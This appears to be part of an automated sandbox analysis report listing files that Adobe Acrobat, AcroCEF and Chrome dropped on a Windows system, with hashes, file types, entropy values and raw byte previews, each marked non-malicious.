                                              SSDEEP:24:YFE5VDpGaGlayRVTXR9M/RCzCPUP73Jhl5oCaWRPjVLvj0SvfHeC2mmx2LSv5kD3:Y+Gp6ACsPdhlRVvbcxvkD6Mkvt9xI
                                              MD5:F4EED6C8EF4D1995C1EB2A03F727AC84
                                              SHA1:EB52A28CAF1AEE543CE10344C7A90722CAEF0A0F
                                              SHA-256:E894E6286D337CDFD4CF965BB894B93B1B8486CDEF5733EEBB8BFA6C306CC6C9
                                              SHA-512:0FFFEFF5A1456AFDA9F060763AF9C42CB457D31180E042640AD5FFC1E2D8A45CE9383791680E5F51CB0E75669E0F2F15E5A3F608ABD6D176B200BE9A86487526
                                              Malicious:false
                                              Reputation:low
                                              Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"770b22d61be3003c9b5c7db32fac964a","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1050,"ts":1727417959000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"77ff893ad382653f1a234ec8f158227f","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":1164,"ts":1727417959000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"cf5dd02bc97d2a83b68b206922613520","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1058,"ts":1727417959000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"ae805e8aab0b372cd27c69d07cc0ca12","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1063,"ts":1727417959000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"3869a4bb2fa8d54fc5d5b16e949f3ed7","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":1038,"ts":1727417959000},{"id":"Edit_InApp_Aug2020","info":{"dg":"3ce8f238ff3eb330c65cf83e88523ea2","sid":"Edit_InApp_Aug2020"},"mimeType":"file","size":782,"ts":17
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                              Category:dropped
                                              Size (bytes):12288
                                              Entropy (8bit):1.1874725840709612
                                              Encrypted:false
                                              SSDEEP:48:TGufl2GL7msEHUUUUUUUUg9SvR9H9vxFGiDIAEkGVvpsJ:lNVmswUUUUUUUUm+FGSItA
                                              MD5:052589C60D705AD857859EF6FA038DC2
                                              SHA1:0713E4F1B1047D19F2C9709DF856FC46D3ED30AA
                                              SHA-256:10FD1563BE4B6D82FEC514037CBE2C6AF2521E0DAA04762C2C4832A25B81D7FC
                                              SHA-512:00214B5EF8DF1A63254CE076C25898BA2B967FB8DA34234F1C5A92AE4FD99F773191D2D36906B693ECED587C632AE953A28229C5CE0F2982C1C6EB9E749892D3
                                              Malicious:false
                                              Reputation:low
                                              Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:SQLite Rollback Journal
                                              Category:dropped
                                              Size (bytes):8720
                                              Entropy (8bit):1.607434344536688
                                              Encrypted:false
                                              SSDEEP:48:7M3KUUUUUUUUUUgFvR9H9vxFGiDIAEkGVvkqFl2GL7ms7:7FUUUUUUUUUU0FGSItmKVms7
                                              MD5:25F2A9B3745C6D84B3BC3C46A03A2FC7
                                              SHA1:1C4D1E2200A0CA3E720130E67F9E810693D4F356
                                              SHA-256:168930E208F0E81F00F3BAA486D782A77000EE6FFD113BDB9118E9832152E1BD
                                              SHA-512:7CF6CE1C6539CF321CA2336373DADFABFF40999D6C7F4E46EEBE2D4692F164EB184DC8CB65A88420F509A9BE012C6625E38C4FE4EBF7C9F4E000034F3145EF1B
                                              Malicious:false
                                              Reputation:low
                                              Preview:.... .c........l......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):246
                                              Entropy (8bit):3.4967695053263634
                                              Encrypted:false
                                              SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K80leH:Qw946cPbiOxDlbYnuRKPeH
                                              MD5:BEB654D0EC401A81D50968BD0EDDB900
                                              SHA1:F0FADAB6DF4829E52705031D94C2987CAD0B2A74
                                              SHA-256:CD0599A131EFE7FBC4ECDEBC3971AC590FF5841C099274AA398BD9C5EE57E18D
                                              SHA-512:C6C24D88EAE93C9D00DF7A59C6654E46752DADA0461B3834DFD6EA52F31A90246EFE9EA26974610CABF1A1F5DEF5D0D3F35A482382728215D8AEAAB5E1DBF9D7
                                              Malicious:false
                                              Reputation:low
                                              Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.7./.0.9./.2.0.2.4. . .0.2.:.1.9.:.2.2. .=.=.=.....
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:PDF document, version 1.6, 0 pages
                                              Category:dropped
                                              Size (bytes):358
                                              Entropy (8bit):5.018568869694409
                                              Encrypted:false
                                              SSDEEP:6:IngVMrexJzJT0y9VEQIFVmb/eu2g/86S1kxROO1tVeRtVeOCSyAAO:IngVMre9T0HQIDmy9g06JXxeRneOlX
                                              MD5:0749E1A273B3CDD1EA1157A773A1C523
                                              SHA1:3CE1911B141D2B38DA0CC23E19AADED5BE8E5F08
                                              SHA-256:FA8C5E2EF5D42B40E6ECEC834EABA4C3EF3574B1A894B67AF25AD751B8AC56DC
                                              SHA-512:4D3D418BAE8AB241E519D26FF2802BA9D33F5FC1E573683FBD76BCAF7852ED328215E0F40002C8D8C9889A8613EA4EF50271EBABF8F6F319D46475572B083AEA
                                              Malicious:false
                                              Reputation:low
                                              Preview:%PDF-1.6.%......1 0 obj.<</Pages 2 0 R/Type/Catalog>>.endobj.2 0 obj.<</Count 0/Kids[]/Type/Pages>>.endobj.3 0 obj.<<>>.endobj.xref..0 4..0000000000 65535 f..0000000016 00000 n..0000000061 00000 n..0000000107 00000 n..trailer..<</Size 4/Root 1 0 R/Info 3 0 R/ID[<66634AA0F9DD57449B755DAF535D06F9><66634AA0F9DD57449B755DAF535D06F9>]>>..startxref..127..%%EOF..
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:ASCII text, with very long lines (393)
                                              Category:dropped
                                              Size (bytes):16525
                                              Entropy (8bit):5.345946398610936
                                              Encrypted:false
                                              SSDEEP:384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW
                                              MD5:8947C10F5AB6CFFFAE64BCA79B5A0BE3
                                              SHA1:70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778
                                              SHA-256:4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485
                                              SHA-512:B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0
                                              Malicious:false
                                              Reputation:low
                                              Preview:SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:088+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig:
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):15114
                                              Entropy (8bit):5.34214253096968
                                              Encrypted:false
                                              SSDEEP:384:zWjJ3JsJPJrJAJ6gJEJY1JGJNi9iFiyiMvrESE0EqEkrDr7rqrPrqWCaCeCspA8/:Z8R
                                              MD5:AFE03B2A947820B82040D74564CA9294
                                              SHA1:AF21640F2039ED6E227F3B436B6A525B9DF44296
                                              SHA-256:CAE4B3810EFBD69677B02BE4DE1A5B7F831F63195103D137ADFFBFF607ACC9E4
                                              SHA-512:87C586F7C9E4C2ECF2A6CED40D1A76C820C2F722C267C08F91745A834189A7030E48EFA24FF87E4BC0F4245A5C1826A358C5ED704866EE9D5BC3306E6FF5A9C7
                                              Malicious:false
                                              Reputation:low
                                              Preview:SessionID=2e024f2b-d240-4bb1-8763-465de40ca41d.1727417956384 Timestamp=2024-09-27T02:19:16:384-0400 ThreadID=6120 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=2e024f2b-d240-4bb1-8763-465de40ca41d.1727417956384 Timestamp=2024-09-27T02:19:16:387-0400 ThreadID=6120 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=2e024f2b-d240-4bb1-8763-465de40ca41d.1727417956384 Timestamp=2024-09-27T02:19:16:387-0400 ThreadID=6120 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=2e024f2b-d240-4bb1-8763-465de40ca41d.1727417956384 Timestamp=2024-09-27T02:19:16:387-0400 ThreadID=6120 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=2e024f2b-d240-4bb1-8763-465de40ca41d.1727417956384 Timestamp=2024-09-27T02:19:16:387-0400 ThreadID=6120 Component=ngl-lib_NglAppLib Description="SetConf
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):29752
                                              Entropy (8bit):5.398231742811469
                                              Encrypted:false
                                              SSDEEP:768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2rw:c
                                              MD5:76B23292C0EF556CE836110096051F5E
                                              SHA1:6FA7743F753FA522E707297351A716E36EFD9FD5
                                              SHA-256:642D4BC5B0FCAE1C223AA608886CFD97B9EE3C1EEB4D8A5EA9F1E12DCBA7EFB3
                                              SHA-512:0A85ED465E266F36EFD186E4A0F7FB11FFBEE43A6DCCAD4C6F3018E187103291C15A3451F2374C0E0BBBF92403842B5A3AE250D60C0436BE5BC38D644946EDDF
                                              Malicious:false
                                              Reputation:low
                                              Preview:03-10-2023 12:50:40:.---2---..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Starting NGL..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..03-10-2023 12:50:40:.Closing File..03-10-
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                              Category:dropped
                                              Size (bytes):386528
                                              Entropy (8bit):7.9736851559892425
                                              Encrypted:false
                                              SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                              MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                              SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                              SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                              SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                              Malicious:false
                                              Reputation:low
                                              Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                              Category:dropped
                                              Size (bytes):1419751
                                              Entropy (8bit):7.976496077007677
                                              Encrypted:false
                                              SSDEEP:24576:/xA7owWLcGZtwYIGNPJodpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLcGZtwZGk3mlind9i4ufFXpAXkru
                                              MD5:A46246FAEAB95D87F5B4FE236C2B3D3E
                                              SHA1:7F018DB9238A63FEAD8D11A92297E7366058A75A
                                              SHA-256:7E822FECC47177C5A7F4C250E7D53509D104DE68B0D0CE9445877B508400988E
                                              SHA-512:8AAB79958BF39F014FBA7F69287FE0C357746E63FA3482DE3231BDF4A97B964A0815DAF7BFE9751C55BA6BE618E0A964CEB23FC30B4FA9DFEB284F42EBA897BF
                                              Malicious:false
                                              Reputation:low
                                              Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                              Category:dropped
                                              Size (bytes):758601
                                              Entropy (8bit):7.98639316555857
                                              Encrypted:false
                                              SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                              MD5:3A49135134665364308390AC398006F1
                                              SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                              SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                              SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                              Malicious:false
                                              Reputation:low
                                              Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                              Category:dropped
                                              Size (bytes):1407294
                                              Entropy (8bit):7.97605879016224
                                              Encrypted:false
                                              SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                                              MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                                              SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                                              SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                                              SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                                              Malicious:false
                                              Reputation:low
                                              Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PDF document, version 1.7, 2 pages
                                              Category:dropped
                                              Size (bytes):175997
                                              Entropy (8bit):7.946401404754199
                                              Encrypted:false
                                              SSDEEP:3072:UwtehApG1vuy3MUlRJ3m7WlxrcnYI9bQhA/S36PO2a5IfLUvLNzlEnG:UwteiGNT3vJ3qGgYI9Na6PO2a5Ijsn
                                              MD5:50F23D4358F98A882771C1597B0891F6
                                              SHA1:225617E370E34C16989DB176D9EC024F6579A07F
                                              SHA-256:26811F9FCE71BD64E1F225E41B50187E0AFC43D497E1060A71A0C85760625019
                                              SHA-512:AA59B1C7CEEB3D05B38139B1E16378490424422D713C1C01A8AB7F93638CAB901F9BA726E304E5D5D62127AE85C19E81EE0A5FC5F1DCAB3FE391F329F4DCF659
                                              Malicious:false
                                              Reputation:low
                                              Preview:%PDF-1.7..%......1 0 obj..<</Type/Catalog/Pages 2 0 R/Lang(en) /StructTreeRoot 32 0 R/MarkInfo<</Marked true>>/Metadata 133 0 R/ViewerPreferences 134 0 R>>..endobj..2 0 obj..<</Type/Pages/Count 2/Kids[ 3 0 R 27 0 R] >>..endobj..3 0 obj..<</Type/Page/Parent 2 0 R/Resources<</Font<</F1 5 0 R/F2 9 0 R/F3 11 0 R/F4 13 0 R/F5 18 0 R/F6 22 0 R/F7 24 0 R>>/ExtGState<</GS7 7 0 R/GS8 8 0 R>>/XObject<</Image15 15 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 17 0 R 20 0 R 21 0 R 26 0 R] /MediaBox[ 0 0 595.32 841.92] /Contents 4 0 R/Group<</Type/Group/S/Transparency/CS/DeviceRGB>>/Tabs/S/StructParents 0>>..endobj..4 0 obj..<</Filter/FlateDecode/Length 2964>>..stream..x....n.8.=@......]R1.ln.t0M3...A1Xx.'5...../...s..DJr,c..%.#....z|....7...O.'......|:.,..:.|..._M...f.\._?....~.Mog...&..g........8...h*..... .....?.........5'....... 4#.D.2.H.GT.2y..7..._..........S@...........)0..K..wt2.Q.....N..B.\.G.......P..l.24...G2.....?^..u..k..@......5t?^]...a....yQIL../..N...J.*...:n
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PDF document, version 1.7, 2 pages
                                              Category:dropped
                                              Size (bytes):42108
                                              Entropy (8bit):7.90758681280332
                                              Encrypted:false
                                              SSDEEP:768:y8sukbxUKF0lFMD0HsDe//9/CNRvX5wzSQIIQjcQlpTff2KOhkIAYJzDfNQ0mZeV:31KyEwtep5wrPSARfbSeUTQ2SXIyDPyo
                                              MD5:C06B2D7FE134063204239523F3E6BBF6
                                              SHA1:DCC5773287F14B81FFED38C813CD2076350020F8
                                              SHA-256:304E10E61B04EAF341273E7EE22AB0387123B55B38318445814C41DD0558605D
                                              SHA-512:086B46BB5C6DAA2DCD0B2A5C358E4480238A92E7DCCDB99DBB8F35F1785BFDEEFA867D21E54CA7AC3C408E55CDB7545BF7C9E3CA2DA73F416F48DAB4B153BBDF
                                              Malicious:false
                                              Reputation:low
                                              Preview:%PDF-1.7..%......1 0 obj..<</Type/Catalog/Pages 2 0 R/Lang(en) /StructTreeRoot 32 0 R/MarkInfo<</Marked true>>/Metadata 133 0 R/ViewerPreferences 134 0 R>>..endobj..2 0 obj..<</Type/Pages/Count 2/Kids[ 3 0 R 27 0 R] >>..endobj..3 0 obj..<</Type/Page/Parent 2 0 R/Resources<</Font<</F1 5 0 R/F2 9 0 R/F3 11 0 R/F4 13 0 R/F5 18 0 R/F6 22 0 R/F7 24 0 R>>/ExtGState<</GS7 7 0 R/GS8 8 0 R>>/XObject<</Image15 15 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 17 0 R 20 0 R 21 0 R 26 0 R] /MediaBox[ 0 0 595.32 841.92] /Contents 4 0 R/Group<</Type/Group/S/Transparency/CS/DeviceRGB>>/Tabs/S/StructParents 0>>..endobj..4 0 obj..<</Filter/FlateDecode/Length 2964>>..stream..x....n.8.=@......]R1.ln.t0M3...A1Xx.'5...../...s..DJr,c..%.#....z|....7...O.'......|:.,..:.|..._M...f.\._?....~.Mog...&..g........8...h*..... .....?.........5'....... 4#.D.2.H.GT.2y..7..._..........S@...........)0..K..wt2.Q.....N..B.\.G.......P..l.24...G2.....?^..u..k..@......5t?^]...a....yQIL../..N...J.*...:n
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PDF document, version 1.7, 2 pages
                                              Category:dropped
                                              Size (bytes):175997
                                              Entropy (8bit):7.946401404754199
                                              Encrypted:false
                                              SSDEEP:3072:UwtehApG1vuy3MUlRJ3m7WlxrcnYI9bQhA/S36PO2a5IfLUvLNzlEnG:UwteiGNT3vJ3qGgYI9Na6PO2a5Ijsn
                                              MD5:50F23D4358F98A882771C1597B0891F6
                                              SHA1:225617E370E34C16989DB176D9EC024F6579A07F
                                              SHA-256:26811F9FCE71BD64E1F225E41B50187E0AFC43D497E1060A71A0C85760625019
                                              SHA-512:AA59B1C7CEEB3D05B38139B1E16378490424422D713C1C01A8AB7F93638CAB901F9BA726E304E5D5D62127AE85C19E81EE0A5FC5F1DCAB3FE391F329F4DCF659
                                              Malicious:false
                                              Reputation:low
                                              Preview:%PDF-1.7..%......1 0 obj..<</Type/Catalog/Pages 2 0 R/Lang(en) /StructTreeRoot 32 0 R/MarkInfo<</Marked true>>/Metadata 133 0 R/ViewerPreferences 134 0 R>>..endobj..2 0 obj..<</Type/Pages/Count 2/Kids[ 3 0 R 27 0 R] >>..endobj..3 0 obj..<</Type/Page/Parent 2 0 R/Resources<</Font<</F1 5 0 R/F2 9 0 R/F3 11 0 R/F4 13 0 R/F5 18 0 R/F6 22 0 R/F7 24 0 R>>/ExtGState<</GS7 7 0 R/GS8 8 0 R>>/XObject<</Image15 15 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 17 0 R 20 0 R 21 0 R 26 0 R] /MediaBox[ 0 0 595.32 841.92] /Contents 4 0 R/Group<</Type/Group/S/Transparency/CS/DeviceRGB>>/Tabs/S/StructParents 0>>..endobj..4 0 obj..<</Filter/FlateDecode/Length 2964>>..stream..x....n.8.=@......]R1.ln.t0M3...A1Xx.'5...../...s..DJr,c..%.#....z|....7...O.'......|:.,..:.|..._M...f.\._?....~.Mog...&..g........8...h*..... .....?.........5'....... 4#.D.2.H.GT.2y..7..._..........S@...........)0..K..wt2.Q.....N..B.\.G.......P..l.24...G2.....?^..u..k..@......5t?^]...a....yQIL../..N...J.*...:n
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PDF document, version 1.7, 2 pages
                                              Category:dropped
                                              Size (bytes):175997
                                              Entropy (8bit):7.946401404754199
                                              Encrypted:false
                                              SSDEEP:3072:UwtehApG1vuy3MUlRJ3m7WlxrcnYI9bQhA/S36PO2a5IfLUvLNzlEnG:UwteiGNT3vJ3qGgYI9Na6PO2a5Ijsn
                                              MD5:50F23D4358F98A882771C1597B0891F6
                                              SHA1:225617E370E34C16989DB176D9EC024F6579A07F
                                              SHA-256:26811F9FCE71BD64E1F225E41B50187E0AFC43D497E1060A71A0C85760625019
                                              SHA-512:AA59B1C7CEEB3D05B38139B1E16378490424422D713C1C01A8AB7F93638CAB901F9BA726E304E5D5D62127AE85C19E81EE0A5FC5F1DCAB3FE391F329F4DCF659
                                              Malicious:false
                                              Reputation:low
